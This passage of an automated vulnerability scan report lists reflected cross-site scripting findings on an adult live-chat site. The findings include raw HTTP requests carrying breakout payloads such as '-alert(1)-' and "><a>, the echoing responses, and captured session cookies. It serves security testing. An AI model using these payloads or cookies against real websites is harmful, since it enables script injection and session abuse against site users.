BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:22:34 GMT Connection: close Content-Length: 53900 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <a href="/live-sex-chats/role-play/?43819"><a>7fb20b0957a=1"> ...[SNIP]...
2.108. http://imlive.com/live-sex-chats/role-play/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://imlive.com
Path: /live-sex-chats/role-play/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 27f69'-alert(1)-'603afae0b8e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/role-play/?27f69'-alert(1)-'603afae0b8e=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:22:44 GMT Connection: close Content-Length: 54077 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/role-play/?27f69'-alert(1)-'603afae0b8e=1&qs=cat=1^roomid=-999^27f69'-alert(1)-'603afae0b8e=1&qs=cat=1^roomid=-999^27f69'-alert(1)-'603afae0b8e=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d ...[SNIP]...
2.109. http://imlive.com/live-sex-chats/sex-show-galleries/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://imlive.com
Path: /live-sex-chats/sex-show-galleries/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 34839"><a>e84c423b110 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /live-sex-chats/sex-show-galleries/?34839"><a>e84c423b110=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:02 GMT Connection: close Content-Length: 29751 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/live-sex-chats/sex-show-galleries/?34839"><a>e84c423b110=1');return false;" lang="en-US" hreflang="en-US"> ...[SNIP]...
2.110. http://imlive.com/live-sex-chats/sex-show-galleries/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://imlive.com
Path: /live-sex-chats/sex-show-galleries/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cd9ca'-alert(1)-'52f7516f46a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/sex-show-galleries/?cd9ca'-alert(1)-'52f7516f46a=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:19 GMT Connection: close Content-Length: 29898 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/content.aspx&he=imlive.com&ul=/live-sex-chats/sex-show-galleries/?cd9ca'-alert(1)-'52f7516f46a=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ...[SNIP]...
2.111. http://imlive.com/live-sex-chats/sex-show-photos/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://imlive.com
Path: /live-sex-chats/sex-show-photos/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 71e01'-alert(1)-'ba036a24c83 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/sex-show-photos/?71e01'-alert(1)-'ba036a24c83=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:28 GMT Connection: close Content-Length: 25736 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/snapshotgallery.aspx&he=imlive.com&ul=/live-sex-chats/sex-show-photos/?71e01'-alert(1)-'ba036a24c83=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ...[SNIP]...
2.112. http://imlive.com/live-sex-chats/sex-show-photos/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://imlive.com
Path: /live-sex-chats/sex-show-photos/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36a69"><a>8ff796eb34d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /live-sex-chats/sex-show-photos/?36a69"><a>8ff796eb34d=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:18 GMT Connection: close Content-Length: 25588 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/live-sex-chats/sex-show-photos/?36a69"><a>8ff796eb34d=1');return false;" lang="en-US" hreflang="en-US"> ...[SNIP]...
2.113. http://imlive.com/live-sex-chats/sex-show-sessions/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://imlive.com
Path: /live-sex-chats/sex-show-sessions/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 45e02'-alert(1)-'fb52648c8dd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/sex-show-sessions/?45e02'-alert(1)-'fb52648c8dd=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:37 GMT Connection: close Content-Length: 26074 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/recordedlivesessions.aspx&he=imlive.com&ul=/live-sex-chats/sex-show-sessions/?45e02'-alert(1)-'fb52648c8dd=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ...[SNIP]...
2.114. http://imlive.com/live-sex-chats/sex-show-sessions/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://imlive.com
Path: /live-sex-chats/sex-show-sessions/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1dabb"><a>3c523209842 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /live-sex-chats/sex-show-sessions/?1dabb"><a>3c523209842=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:07 GMT Connection: close Content-Length: 25926 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/live-sex-chats/sex-show-sessions/?1dabb"><a>3c523209842=1');return false;" lang="en-US" hreflang="en-US"> ...[SNIP]...
2.115. http://imlive.com/live-sex-chats/sex-video-features/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://imlive.com
Path: /live-sex-chats/sex-video-features/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 80442'-alert(1)-'ebd4ed614b9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/sex-video-features/?80442'-alert(1)-'ebd4ed614b9=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:37 GMT Connection: close Content-Length: 32369 Vary: Accept-Encoding
